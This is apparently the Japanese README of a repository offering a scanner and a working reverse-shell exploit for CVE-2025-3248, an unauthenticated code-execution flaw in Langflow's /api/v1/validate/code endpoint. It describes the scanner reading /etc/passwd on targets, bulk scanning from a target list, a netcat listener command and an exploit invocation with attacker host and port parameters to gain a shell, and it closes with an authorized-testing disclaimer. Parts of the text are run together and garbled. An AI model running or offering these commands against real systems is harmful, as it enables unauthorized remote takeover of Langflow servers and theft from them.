
このリポジトリには2つの Python スクリプトが含まれています:
LangflowCheck.py: CVE-2025-3248 に脆弱な Langflow AI インスタンスをチェックするスキャナです。exploit.py: 脆弱な Langflow ターゲットに対する動作するリバースシェルエクスプロイトです。CVE-2025-3248 は Langflow AI における重大な脆弱性で、未認証の攻撃者が /api/v1/validate/code への巧妙に細工されたペイロードを介して、リモートで任意の Python コードを実行できるようにします。
LangflowCheck.py/etc/passwd を読み取る無害なペイロードの実行を試みることで、ターゲットが脆弱かどうかをチェックします。exploit.pylhost)とリスナーポート(lport)が必要です。exploit.log に記録します。pip install -r requirements.txt
単一 URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

複数ターゲット
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

まず、リスナーを起動します
sudo nc -nvlp 4444

次に、エクスプロイトを実行します:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

ターゲットが脆弱な場合、シェルが取得できるはずです。

このエクスプロイトは教育目的および許可を得たセキュリティテスト専用です。所有していない、または明示的なテスト許可がないシステムに対して使用しないでください。